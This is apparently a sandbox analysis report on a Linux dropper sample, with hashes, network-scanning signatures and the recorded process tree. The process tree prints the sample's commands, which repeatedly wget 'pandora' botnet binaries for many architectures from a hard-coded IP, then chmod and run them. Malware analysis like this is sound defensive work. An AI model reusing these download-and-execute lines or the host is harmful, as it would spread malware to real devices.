e8527836291246c811470f46bcb9e3785b01d89f842e64d67f778b194a049c1f | Triage

Submit
Reports

Overview

overview

9

Static

static

e852783629...049c1f

linux_amd64

9

e852783629...049c1f

linux_armhf

9

e852783629...049c1f

linux_mips

9

e852783629...049c1f

linux_mipsel

9

Analysis

max time kernel
13927s
max time network
154s
platform
linux_amd64
resource
ubuntu1804-amd64-en-20211208
submitted
18-05-2022 21:23

Sharing

Static task

static1

Behavioral task

behavioral1

Sample

e8527836291246c811470f46bcb9e3785b01d89f842e64d67f778b194a049c1f

Resource

ubuntu1804-amd64-en-20211208

linux_amd64

0 signatures

0 seconds

Behavioral task

behavioral2

Sample

e8527836291246c811470f46bcb9e3785b01d89f842e64d67f778b194a049c1f

Resource

debian9-armhf-en-20211208

linux_armhf

0 signatures

0 seconds

Behavioral task

behavioral3

Sample

e8527836291246c811470f46bcb9e3785b01d89f842e64d67f778b194a049c1f

Resource

debian9-mipsbe-en-20211208

linux_mips

0 signatures

0 seconds

Behavioral task

behavioral4

Sample

e8527836291246c811470f46bcb9e3785b01d89f842e64d67f778b194a049c1f

Resource

debian9-mipsel-en-20211208

linux_mipsel

0 signatures

0 seconds

Report Analysis Logs

General

Target

e8527836291246c811470f46bcb9e3785b01d89f842e64d67f778b194a049c1f
Size

2KB
MD5

c7866a6bf93fe47bb819d8f5d379e353
SHA1

757fb6c3a1aa19e129b3ea3fef1da5bcfe70e55c
SHA256

e8527836291246c811470f46bcb9e3785b01d89f842e64d67f778b194a049c1f
SHA512

370ee08829af83c795191036f041e89949d1b03eb3b35452c17dc08555ca5633a1c0262ff2f4aaa730036973c510642dd3d0476b7bdad0d8839cd05087a10733

Score

9^/10

discovery

Malware Config

Signatures

Contacts a large (188022) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Scanning
T1046
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Scanning
T1046

Processes

./e8527836291246c811470f46bcb9e3785b01d89f842e64d67f778b194a049c1f
./e8527836291246c811470f46bcb9e3785b01d89f842e64d67f778b194a049c1f
1⤵
PID:593

/usr/bin/wget
wget http://107.174.176.165/Pandoras_Box/pandora.x86
2⤵
PID:594

/bin/cat
cat pandora.x86
2⤵
PID:601

/bin/chmod
chmod +x awoo e8527836291246c811470f46bcb9e3785b01d89f842e64d67f778b194a049c1f pandora.x86 systemd-private-3c6a296132154b75a0c9689e5ab8717a-systemd-resolved.service-pOOdTT systemd-private-3c6a296132154b75a0c9689e5ab8717a-systemd-timesyncd.service-xDlk5z
2⤵
PID:602

./awoo
./awoo
2⤵
PID:603

/usr/bin/wget
wget http://107.174.176.165/Pandoras_Box/pandora.mips
2⤵
PID:607

/bin/chmod
chmod +x awoo e8527836291246c811470f46bcb9e3785b01d89f842e64d67f778b194a049c1f pandora.mips pandora.x86 systemd-private-3c6a296132154b75a0c9689e5ab8717a-systemd-resolved.service-pOOdTT systemd-private-3c6a296132154b75a0c9689e5ab8717a-systemd-timesyncd.service-xDlk5z
2⤵
PID:615

./awoo
./awoo
2⤵
PID:616

/usr/bin/wget
wget http://107.174.176.165/Pandoras_Box/pandora.mpsl
2⤵
PID:620

/bin/chmod
chmod +x awoo e8527836291246c811470f46bcb9e3785b01d89f842e64d67f778b194a049c1f pandora.mips pandora.mpsl pandora.x86 systemd-private-3c6a296132154b75a0c9689e5ab8717a-systemd-resolved.service-pOOdTT systemd-private-3c6a296132154b75a0c9689e5ab8717a-systemd-timesyncd.service-xDlk5z
2⤵
PID:626

./awoo
./awoo
2⤵
PID:627

/usr/bin/wget
wget http://107.174.176.165/Pandoras_Box/pandora.arm4
2⤵
PID:631

/bin/chmod
chmod +x awoo e8527836291246c811470f46bcb9e3785b01d89f842e64d67f778b194a049c1f pandora.mips pandora.mpsl pandora.x86 systemd-private-3c6a296132154b75a0c9689e5ab8717a-systemd-resolved.service-pOOdTT systemd-private-3c6a296132154b75a0c9689e5ab8717a-systemd-timesyncd.service-xDlk5z
2⤵
PID:639

./awoo
./awoo
2⤵
PID:640

/usr/bin/wget
wget http://107.174.176.165/Pandoras_Box/pandora.arm5
2⤵
PID:644

/bin/chmod
chmod +x awoo e8527836291246c811470f46bcb9e3785b01d89f842e64d67f778b194a049c1f pandora.arm5 pandora.mips pandora.mpsl pandora.x86 systemd-private-3c6a296132154b75a0c9689e5ab8717a-systemd-resolved.service-pOOdTT systemd-private-3c6a296132154b75a0c9689e5ab8717a-systemd-timesyncd.service-xDlk5z
2⤵
PID:650

./awoo
./awoo
2⤵
PID:651

/usr/bin/wget
wget http://107.174.176.165/Pandoras_Box/pandora.arm6
2⤵
PID:655

/bin/chmod
chmod +x awoo e8527836291246c811470f46bcb9e3785b01d89f842e64d67f778b194a049c1f pandora.arm5 pandora.arm6 pandora.mips pandora.mpsl pandora.x86 systemd-private-3c6a296132154b75a0c9689e5ab8717a-systemd-resolved.service-pOOdTT systemd-private-3c6a296132154b75a0c9689e5ab8717a-systemd-timesyncd.service-xDlk5z
2⤵
PID:661

./awoo
./awoo
2⤵
PID:662

/usr/bin/wget
wget http://107.174.176.165/Pandoras_Box/pandora.arm7
2⤵
PID:666

/bin/chmod
chmod +x awoo e8527836291246c811470f46bcb9e3785b01d89f842e64d67f778b194a049c1f pandora.arm5 pandora.arm6 pandora.arm7 pandora.mips pandora.mpsl pandora.x86 systemd-private-3c6a296132154b75a0c9689e5ab8717a-systemd-resolved.service-pOOdTT systemd-private-3c6a296132154b75a0c9689e5ab8717a-systemd-timesyncd.service-xDlk5z
2⤵
PID:672

./awoo
./awoo
2⤵
PID:673

/usr/bin/wget
wget http://107.174.176.165/Pandoras_Box/pandora.ppc
2⤵
PID:677

/bin/chmod
chmod +x awoo e8527836291246c811470f46bcb9e3785b01d89f842e64d67f778b194a049c1f pandora.arm5 pandora.arm6 pandora.arm7 pandora.mips pandora.mpsl pandora.ppc pandora.x86 systemd-private-3c6a296132154b75a0c9689e5ab8717a-systemd-resolved.service-pOOdTT systemd-private-3c6a296132154b75a0c9689e5ab8717a-systemd-timesyncd.service-xDlk5z
2⤵
PID:683

./awoo
./awoo
2⤵
PID:684

/usr/bin/wget
wget http://107.174.176.165/Pandoras_Box/pandora.m68k
2⤵
PID:688

/bin/chmod
chmod +x awoo e8527836291246c811470f46bcb9e3785b01d89f842e64d67f778b194a049c1f pandora.arm5 pandora.arm6 pandora.arm7 pandora.m68k pandora.mips pandora.mpsl pandora.ppc pandora.x86 systemd-private-3c6a296132154b75a0c9689e5ab8717a-systemd-resolved.service-pOOdTT systemd-private-3c6a296132154b75a0c9689e5ab8717a-systemd-timesyncd.service-xDlk5z
2⤵
PID:694

./awoo
./awoo
2⤵
PID:695

/usr/bin/wget
wget http://107.174.176.165/Pandoras_Box/pandora.sh4
2⤵
PID:699

/bin/chmod
chmod +x awoo e8527836291246c811470f46bcb9e3785b01d89f842e64d67f778b194a049c1f pandora.arm5 pandora.arm6 pandora.arm7 pandora.m68k pandora.mips pandora.mpsl pandora.ppc pandora.sh4 pandora.x86 systemd-private-3c6a296132154b75a0c9689e5ab8717a-systemd-resolved.service-pOOdTT systemd-private-3c6a296132154b75a0c9689e5ab8717a-systemd-timesyncd.service-xDlk5z
2⤵
PID:705

./awoo
./awoo
2⤵
PID:706

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Network Service Scanning

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

© 2018-2024

Terms | Privacy